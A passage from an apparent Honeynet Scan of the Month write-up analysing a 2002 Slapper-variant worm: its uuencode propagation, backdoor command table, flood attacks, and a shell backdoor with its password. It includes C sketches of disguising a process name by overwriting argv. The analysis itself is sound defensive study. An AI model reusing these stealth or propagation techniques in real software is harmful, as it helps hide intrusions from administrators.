1433     if (FD_ISSET(sockfd, &rset)) if ((n = read(sockfd, rcv, sizeof(rcv))) == 0) return 0;
1434   }
1435 }

	The worm will generate these files while propagating itself to the remote compromised machine: `/tmp/.unlock.uu`, `/tmp/.unlock.c`, `/tmp/.update.c`, `/tmp/httpd`, `/tmp/update`, and `/tmp/.unlock`. Here the worm is just deleting these files (just in case they exist) to make sure that nothing will stomp on the propagation process.
	The worm starts writing to `/tmp/.unlock.uu`. The worm is using a "here document" and the cat command to create the file. The remote shell will stop writing data to the `/tmp/.unlock.uu` file as soon as it sees the string "__eof__" (see bash's man page for details on how "here documents" work).
	The `encode()` function will take the worm source, which is stored in the compressed GNU tar archive `/tmp/.unlock`, "uuencode" it, and send it to the remote shell by just "pasting" the data to standard output. The worm uses the uuencode encoding method to be able to transmit a binary file (the compressed GNU tar archive) over a transmission medium that does not support anything other than simple ASCII data (uuencoding converts a binary file to ASCII data). The worm can't just transmit the GNU tar archive because the shell and the remote terminal would interpret some of the data as control characters and the file transfer would fail.
	The worm writes "__eof__" to tell the remote shell that it is done sending data. With this, the file `/tmp/.unlock.uu` is fully created and the worm is ready for the next step.
	The worm sends several commands in one line to the remote shell. These commands will decode the uuencoded file, untar it, and then compile the two C source code files in the tar archive. The tools used in this process are the uudecode command, the tar command, and the GNU C Compiler gcc, all of which are available in most Linux installations by default.
	The worm runs the two binaries produced. Now a new instance of the worm is running on the remote machine. This instance will start searching for other machines to infect.
	After waiting for three seconds, the worm finally deletes all the files used in the propagation process, except the file `/tmp/.unlock`, which, as I already mentioned, is the compressed GNU tar archive that contains the worm source, and that is obviously needed to propagate the worm to other machines.
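To make the uuencoding step more concrete, here is a minimal sketch of how one line of uuencoded output is produced: a length character followed by four printable characters for every three input bytes. The function names are mine, and I have not checked this against the worm's encode() function. In particular, emitting a backquote for a zero value is an assumption borrowed from common uuencode implementations; some emit a space instead.

```c
#include <stddef.h>

/* Maps a 6-bit value to its printable uuencode character. Zero becomes
 * a backquote, as many implementations do (assumption, see above). */
static char uu_char(unsigned v)
{
    v &= 0x3f;
    return v ? (char)(v + 32) : '`';
}

/* Encodes up to 45 bytes from `in` as one uuencoded line (without the
 * trailing newline). `out` must have room for at least 62 characters.
 * Returns the number of characters written, not counting the NUL. */
size_t uu_encode_line(const unsigned char *in, size_t n, char *out)
{
    size_t i, o = 0;

    if (n > 45)
        n = 45;                          /* one line carries at most 45 bytes */
    out[o++] = uu_char((unsigned)n);     /* length character */
    for (i = 0; i < n; i += 3) {
        unsigned b0 = in[i];
        unsigned b1 = (i + 1 < n) ? in[i + 1] : 0;   /* pad short groups */
        unsigned b2 = (i + 2 < n) ? in[i + 2] : 0;

        out[o++] = uu_char(b0 >> 2);
        out[o++] = uu_char(((b0 & 0x03) << 4) | (b1 >> 4));
        out[o++] = uu_char(((b1 & 0x0f) << 2) | (b2 >> 6));
        out[o++] = uu_char(b2 & 0x3f);
    }
    out[o] = '\0';
    return o;
}
```

For example, the three bytes "Cat" encode to the line "#0V%T". Every character produced is printable ASCII, which is why the data survives being pasted into an interactive shell.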

With this, I have finally covered all the details regarding how the worm propagates to other machines.

4. Taming the Worm

After I studied the worm and had a good understanding of what it does I decided to have a little bit of fun with it. For this I ran the worm on a machine connected to a network that is disconnected from the Internet. I also wrote a small C program to control the worm. The control program allowed me to send commands to the worm, and then I observed the activity generated by the worm with a sniffer like tcpdump.

Using the control program and observing the network traffic I was able to discover some of the bugs I have pointed out elsewhere in this document.

Here's an example of how the control program looks:

Agent address is 10.10.10.16

[0] Enter agent IP address
[1] Run a command on the agent
[2] UDP flood
[3] TCP flood
[4] DNS flood
[5] Scan remote files for e-mail addresses
[6] Exit

Enter option:

5. Questions

5.1. Question 1

Q: Which is the type of the .unlock file? When was it generated?

A: As I showed in Section 2, the .unlock file is a compressed GNU tar archive. The tar archive contains only two files, called .unlock.c and .update.c, which are C source files. The compressed GNU tar archive was generated on September 22, 2002 at 1:06 PM.

5.2. Question 2

Q: Based on the source code, who is the author of this worm? When it was created? Is it compatible with the date from question 1?

A: By examining the .unlock.c file we can guess that the author of the worm is an individual that uses the IRC alias contem on the EFNet IRC network. We can see that in the first lines of the program:

1 /******************************************************************
2  *                                                                *
3  *           Peer-to-peer UDP Distributed Denial of Service (PUD) *
4  *                         by contem@efnet                        *
5  *                                                                *
[...]

However, the file we are looking at was modified by an individual that goes by the alias "aion", and whose e-mail address is aion@ukr.net.

[...]
37 *                                                                *
38 *  some modification done by aion (aion@ukr.net)                 *
39 ******************************************************************/
[...]

The .unlock.c file was generated on September 20, 2002 at 9:28 AM, and the .update.c file was generated on September 19, 2002 at 5:57 PM. Since the compressed tar archive was generated two days later (on September 22, 2002) I would say that the creation dates of the C source files are compatible with the creation date of the tar archive (in addition to the timestamps of the files, in the .unlock.c file, the symbol VERSION is declared in line 71 as "20092002", which seems to imply that the version number was chosen based on the day the code was released - September 20, 2002.)
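Reading the VERSION string as a date assumes a day-month-year layout (DDMMYYYY). A minimal sketch of that interpretation follows; the function name `parse_ddmmyyyy` is hypothetical and nothing like it appears in the worm source.

```c
#include <stdio.h>

/* Parse an 8-digit string laid out as DDMMYYYY.
 * Returns 1 if three fields were read and the day and month are in
 * range, 0 otherwise. No per-month day count check is attempted. */
int parse_ddmmyyyy(const char *s, int *day, int *month, int *year)
{
    if (sscanf(s, "%2d%2d%4d", day, month, year) != 3)
        return 0;
    return *day >= 1 && *day <= 31 && *month >= 1 && *month <= 12;
}
```

Applied to "20092002", this yields day 20, month 9, and year 2002, which matches the timestamp of .unlock.c.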

5.3. Question 3

Q: Which process name is used by the worm when it is running?

A: Line 78 of .unlock.c contains the following symbol definition:

78 #define PSNAME          "httpd "

As I mentioned in Section 3.1, in lines 1803-1804, very close to the beginning of main(), the worm clears the program name as well as all the parameters passed through the command line by zeroing out the strings pointed to by the pointers in the argv array.

Then, in line 1805, the worm calls the strcpy() C library function to copy the string defined by the symbol PSNAME to the string pointed to by the argv[0] pointer, which happens to be the program's name.

The end result is that the worm will be obfuscating the name of its process so an administrator would only see the process name "httpd" when the ps command is run.
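The technique can be sketched as follows. This is an illustration and not the worm's code: the function name `disguise_argv` is hypothetical, and unlike the strcpy() call described above, the sketch never writes more bytes than the original argv[0] string held, so a short program name cannot be overrun.

```c
#include <string.h>

/* Zero every command-line string in place, then write `name` over
 * argv[0]. The copy is limited to the original length of argv[0],
 * so the existing terminating NUL is always preserved. */
void disguise_argv(int argc, char **argv, const char *name)
{
    for (int i = 0; i < argc; i++) {
        size_t len = strlen(argv[i]);

        memset(argv[i], 0, len);        /* wipe the original text */
        if (i == 0) {
            size_t n = strlen(name);

            if (n > len)
                n = len;                /* truncate rather than overflow */
            memcpy(argv[0], name, n);
        }
    }
}
```

On Linux, ps reads a process's command line from the memory that argv points to, so overwriting those strings in place changes what an administrator sees.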

5.4. Question 4

Q: In which format the worm copies itself to the new infected machine? Which files are created in the whole process? After the worm executes itself, which files remain on the infected machine?

A: As I explained in Section 3.3.3, the worm uses the command cat and the "here document" syntax of the bash shell to copy the compressed GNU tar archive that contains the worm's source code to the new compromised machine. Since the worm is just sending the data to the standard output of the remote shell, it can't just copy the tar archive as it is because it contains binary data that could be interpreted as shell meta-characters or terminal control data. For this reason, the worm uuencodes the file and transmits the resulting data, which is just regular ASCII text.

The files that are created during the worm propagation process are the uuencoded archive /tmp/.unlock.uu, the decoded archive /tmp/.unlock, the two C source files extracted from it (.unlock.c and .update.c), and the two binaries compiled from them.

After the worm executes itself in the remote machine, the only file that remains is /tmp/.unlock, the compressed GNU tar archive that contains the worm's source code. All other files are deleted.

5.5. Question 5

Q: Which port is scanned by the worm?

A: The worm scans for TCP port 80, the Hyper Text Transfer Protocol port. If this port is found open, i.e. a TCP connection was successfully established, the worm proceeds to launch the exploit. The actual scan takes place in line 1923, where the worm executes atcp_sync_connect(&clients[n],srv,SCANPORT). SCANPORT is a symbol defined as "80" at the beginning of the worm's C source file.

5.6. Question 6

Q: Which vulnerability the worm tries to exploit? In which architectures?

A: The worm exploits the OpenSSL SSLv2 malformed client key buffer overflow vulnerability, which, as we have seen, allows remote exploitation. I will not go into details here since excellent references to this vulnerability are available on the web, and they explain the problem better than I could. Check the references in Appendix C.

Once a host has been found to have port 80 open, the worm tries to exploit the vulnerability by launching an attack against the HTTPS port, which on most Apache implementations uses the OpenSSL libraries.

As for the "architectures" the worm tries to exploit, "architectures" is not the correct word (although that is the word used in the C source code.) The exploit the worm uses works only on the Intel i386 family, no Sparcs, no PowerPCs, no ia64, no anything else (the worm will try to exploit all other architectures as long as it finds open TCP port 80, but the exploit will not succeed.) Now, there are several "targets" the worm knows about and that guarantee the success of the exploitation. For these known "targets", the worm knows it can tune an exploitation parameter so the exploit succeeds. The different "targets" the worm knows about are stored in the architectures[] array. There are 23 different combinations of Linux distributions and Apache versions. The Linux distributions are Gentoo, Debian, RedHat, SuSE, Mandrake, and Slackware. Apache versions range from 1.3.6 to 1.3.26 (see Section 3.3.2 or line 1241 of .unlock.c for the actual declaration of the architectures[] array.)

5.7. Question 7

Q: What kind of information is sent by the worm by email? To which account?

A: As I mentioned in Section 3.1, the worm sends an e-mail to the address <aion@ukr.net>. It sends the e-mail by establishing a direct TCP connection to port 25 (SMTP) of the host freemail.ukr.net, and by pretending to be <test@microsoft.com>.

The information sent by the worm is just:

hostid: (decimal number)
hostname: (string)
att_from: (string)

hostid and hostname are obtained via the gethostid() and gethostname() C library functions, and they refer to the host executing the worm. att_from is the only parameter passed to the mailme() function, and represents the first argument passed to the worm from the command line. This argument is an IP address.

5.8. Question 8

Q: Which port (and protocol) is used by the worm to communicate to other infected machines?

A: The worm uses UDP port 4156 to talk to other peers. In the C source code, the symbol PORT is used, and it is defined as "4156" at the beginning of the C source file.

5.9. Question 9

Q: Name 3 functionalities built in the worm to attack other networks.

A: The worm can be remotely programmed to generate three types of denial of service (DoS) attacks. The three types are UDP flood, TCP flood, and DNS flood. The UDP and TCP floods are intended to be used against any host, and the DNS flood is intended to be used against DNS servers since it sends DNS queries to the DNS port (UDP 53) of the specified IP address.

Because of the way the worm communicates with other infected machines, it is easy to use these attacks to create a major Distributed Denial of Service Attack (DDoS), where hundreds or thousands of machines create chaos by DoS'ing one or more hosts.

I personally tested the three attacks, as I mentioned in Section 4. The UDP and TCP attacks worked fine (well, the program is a bit buggy, but the attacks worked more or less). The DNS attack seemed to have some problems.

5.10. Question 10

Q: What is the purpose of the .update.c program? Which port does it use?

A: .update.c is a little program written not by the original worm author but by aion <aion@ukr.net>, the (apparently 21-year-old) person who modified the original worm. It just provides a shell on demand on TCP port 1052. To get a shell on a machine running this program one needs to provide the password "aion1981" as soon as the TCP connection with port 1052 is established. This is only in theory, though, since the program as it stands has a critical bug:

52         for(stimer=time(NULL);(stimer+UPTIME)>time(NULL);)
53         {
54           soc_cli = accept(soc_des,
55                       (struct sockaddr *) &client_addr,
                         sizeof(client_addr)); 
56           if (soc_cli > 0)
57           {
58             if (!fork()) {

The accept() function requires that the last parameter be a pointer to an integer that is initially set to the size of the struct sockaddr structure. In this case our buddy aion <aion@ukr.net> is not passing a pointer but an integer directly. You need to be more careful when coding, <aion@ukr.net>.

Now, update does not provide a shell on demand on TCP port 1052 of the host running the compiled version of .update.c at all times: the server is programmed to listen for just 10 seconds and then shut down for 5 minutes. See the next question for details.
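For comparison, here is a minimal sketch of how the call is normally written. The wrapper name `accept_client` is hypothetical and is not part of .update.c; only the accept() call itself is standard.

```c
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

/* Accept one connection on listen_fd and store the peer address in
 * *peer. Returns the connected socket, or -1 on error (errno is set
 * by accept()). */
int accept_client(int listen_fd, struct sockaddr_in *peer)
{
    /* accept() reads this value as the size of the address buffer and
     * overwrites it with the actual address length, so it has to be a
     * variable passed by address, not the integer itself. */
    socklen_t peer_len = sizeof(*peer);

    return accept(listen_fd, (struct sockaddr *)peer, &peer_len);
}
```

A caller would normally test the result with `>= 0` and not `> 0`, since 0 is a valid descriptor; in practice that only matters if standard input has been closed.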

There isn't really anything else to say about .update.c. It is a very small program that can be understood in 2 minutes. It is pretty obvious what it does.

5.11. Question 11

Q (Bonus Question) What is the purpose of the SLEEPTIME and UPTIME values in the .update.c program?

A: SLEEPTIME is a symbol defined at the beginning of the file as "300", and UPTIME is another symbol defined as "10". As I mentioned in the previous question, when update is run, it will open TCP port 1052 and will provide a shell on demand for UPTIME seconds. After UPTIME seconds have passed update will shut down the TCP server for SLEEPTIME seconds.

My guess is that this feature is provided to prevent system administrators from running netstat and finding that a strange process is listening on a non-standard port.
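The effect of the two values can be sketched as a simple duty cycle. This is an idealized model and not code from .update.c: the function name `window_open` is hypothetical, and the model assumes the listener switches state exactly on time, which the real program may not do if accept() blocks while waiting for a connection.

```c
#include <time.h>

#define UPTIME    10    /* seconds the port is open (value from the text) */
#define SLEEPTIME 300   /* seconds the port is closed (value from the text) */

/* Returns 1 if an idealized listener that was started at `start`
 * would be accepting connections at time `now`, 0 otherwise. */
int window_open(time_t start, time_t now)
{
    long elapsed = (long)difftime(now, start);

    if (elapsed < 0)
        return 0;
    /* Each cycle lasts UPTIME + SLEEPTIME seconds; the port is open
     * only during the first UPTIME seconds of the cycle. */
    return (elapsed % (UPTIME + SLEEPTIME)) < UPTIME;
}
```

Under this model the port is open for 10 out of every 310 seconds, or roughly 3% of the time, so a single netstat run is unlikely to catch it.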

A. Files

The following files were generated during this Scan of the Month:

Worm source code: .unlock.c and .update.c. I am not including these files here since it is very easy to generate them: just download the file provided for Scan of the Month November 2002 and follow the procedure I presented in Section 2.
control.c: a program that allows one to control the worm analyzed in this document. Please note that not all commands are implemented, and that some commands have bugs in the worm source, so they might not work at all.
XML sources for this document: this HTML document was generated using DocBook XML. This directory contains all the files used in the generation of this document.

B. Worm Commands

The following table contains the worm commands that are provided as a backdoor. The source code contains a few comments that give an idea of what some of the commands do. For other commands I had to study the source code to figure out what they do. I tested some of the commands by writing a small program that remotely controlled the backdoor.

Table B.1. Worm Commands

Command Code	Function Performed	Comments
0x20	Get information	Information about current status of the worm (version, IP address, etc.)
0x21	Open a bounce	Related to the peer-to-peer network. I believe it allows the worm to proxy connections for another host
0x22	Close a bounce
0x23	Send message to a bounce
0x24	Run a command	The received packet includes, in addition to the 0x24 command code, the command that the attacker wants the infected machine to execute. The worm has code to send back the output of the command to an IP address that is also specified in the received packet. However, there is a critical bug in the code that makes a forked worm process crash when it tries to zero 3000 bytes in an array that only holds about 12 bytes. The bug is due to the declaration of a variable with the same name as another variable in a different context, which makes the intended one invisible from the current scope. I tested this code and the command is executed, although nothing is returned because of the bug.
0x25	Not implemented, does nothing
0x26	Route	Seems related to management of the peer-to-peer network
0x27	Not implemented, does nothing
0x28	List	Apparently, used to get a list of links to other infected machines. Seems related to management/monitoring of the peer-to-peer network
0x29	UDP flood	Starts a Denial of Service attack against another host. UDP is used and the IP address and port to use, as well as the duration of the attack, are specified in the packet. I tested this and it works.
0x2a	TCP flood	Starts a Denial of Service attack against another host. TCP is used and the IP address and port to use, as well as the duration of the attack, are specified in the packet. I tested this and it works.
0x2b	IPv6 TCP flood	Starts a Denial of Service attack against another host. This is for IPv6. It is not enabled in the worm source code (disabled with a #undef.)
0x2c	DNS flood	Starts a Denial of Service attack against a DNS server. DNS requests are sent. The DNS server to use, as well as the duration of the attack, are specified in the packet. I tested this and the DNS query performed is broken.
0x2d	E-mail scan	Runs find / -type f and searches every file found for e-mail addresses. Sends the addresses it finds to UDP port `ESCANPORT` (defined as 10100 at the beginning of the file) of a host specified in the incoming packet.
0x70	Incoming client	Handles registration of new infected machine
0x71	Receive the list
0x72	Send the list
0x73	Get my IP
0x74	Transmit their IP	Sends the IP address of the incoming client to other registered clients
0x41 to 0x47	Relay to client	Resends received packet to all registered clients
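For readers who want to label command codes when inspecting captured traffic, the table above can be expressed as a small lookup. This is only a sketch: the identifiers `cmd_entry`, `cmd_table` and `command_name` are hypothetical, and the descriptions are copied from the table, not from symbol names in the worm source.

```c
#include <stddef.h>

struct cmd_entry {
    unsigned char code;
    const char *name;
};

/* Codes and descriptions as listed in Table B.1. */
static const struct cmd_entry cmd_table[] = {
    { 0x20, "Get information" },
    { 0x21, "Open a bounce" },
    { 0x22, "Close a bounce" },
    { 0x23, "Send message to a bounce" },
    { 0x24, "Run a command" },
    { 0x25, "Not implemented" },
    { 0x26, "Route" },
    { 0x27, "Not implemented" },
    { 0x28, "List" },
    { 0x29, "UDP flood" },
    { 0x2a, "TCP flood" },
    { 0x2b, "IPv6 TCP flood" },
    { 0x2c, "DNS flood" },
    { 0x2d, "E-mail scan" },
    { 0x70, "Incoming client" },
    { 0x71, "Receive the list" },
    { 0x72, "Send the list" },
    { 0x73, "Get my IP" },
    { 0x74, "Transmit their IP" },
};

/* Return the description for a command code, or "Unknown". */
const char *command_name(unsigned char code)
{
    /* The whole range 0x41 to 0x47 is relayed to registered clients. */
    if (code >= 0x41 && code <= 0x47)
        return "Relay to client";

    for (size_t i = 0; i < sizeof cmd_table / sizeof cmd_table[0]; i++)
        if (cmd_table[i].code == code)
            return cmd_table[i].name;
    return "Unknown";
}
```

The lookup says nothing about where the command code sits inside a packet; that layout has to be taken from the worm source.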

C. References

Information about the OpenSSL vulnerability exploited by the worm:
- Advisory from CERT: CERT Advisory CA-2002-23 Multiple Vulnerabilities In OpenSSL.
- Bugtraq information: OpenSSL SSLv2 Malformed Client Key Remote Buffer Overflow Vulnerability.
Media coverage of the worm:
- A Wired article: Linux Worm Hits the Network
- A CNET article: Slapper worm smarting less.
Understanding of the TCP/IP protocols and of Unix network programming using the BSD sockets API is necessary to understand a worm like the one I analyzed in this paper. The following are my favorite books on these topics:
- Stevens, W.R. TCP/IP Illustrated Vol 1. 1994 Addison Wesley.
- Stevens, W.R. Unix Network Programming Vol 1. 2nd Ed. 1998 Prentice Hall.

D. Thanks

Thanks to ...

Chapu for being so patient while her husband was lost in bits, bytes and lines of C source code, and for bringing so much joy to my life. This is dedicated to you; you deserve it a thousand times.
The Honeynet Project for coming up with these highly educational exercises, and for taking the time to go over all the submissions. That must be a lot of work! Keep 'em coming!